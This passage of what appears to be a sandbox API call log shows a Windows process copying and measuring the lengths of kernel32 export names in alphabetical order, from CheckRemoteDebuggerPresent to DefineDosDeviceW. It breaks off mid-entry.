lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.205] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.205] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.205] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.205] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.205] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.205] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.205] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.205] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.205] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.206] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.206] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.206] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.206] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.206] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.206] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.206] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.206] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.206] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.206] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.206] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.206] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.206] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.206] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.206] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.206] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.206] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.206] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.206] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.206] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.207] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.207] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.207] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.207] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.207] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.207] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.207] lstrlenA (lpString="COPYFILEA") returned 9 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.207] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.207] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.207] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.207] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.207] lstrlenA (lpString="COPYFILEW") returned 9 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.207] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.207] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.207] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.207] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.207] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.207] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.207] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.208] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.208] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.208] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.208] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.208] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.208] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.208] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.208] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.208] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.208] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.208] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.208] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.208] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.208] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.208] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.208] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.208] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.208] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.208] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.209] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.209] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.209] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.209] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.209] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.209] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.209] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.209] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.209] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.209] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.209] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.209] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.209] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.209] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.209] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.209] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.209] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.209] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.209] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.209] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.210] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.210] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.210] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.210] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.210] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.210] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.210] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.210] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.210] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.210] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.210] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.210] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.210] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.210] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.210] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.210] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.210] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.210] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.210] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.211] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.211] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.211] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.211] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.211] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.211] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.211] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.211] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.211] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.211] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.211] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.211] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.211] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.211] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.211] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.211] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.211] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.211] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.211] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.211] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.212] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.212] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.212] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.212] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.212] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.212] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.212] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.212] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.212] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.212] lstrcpyA 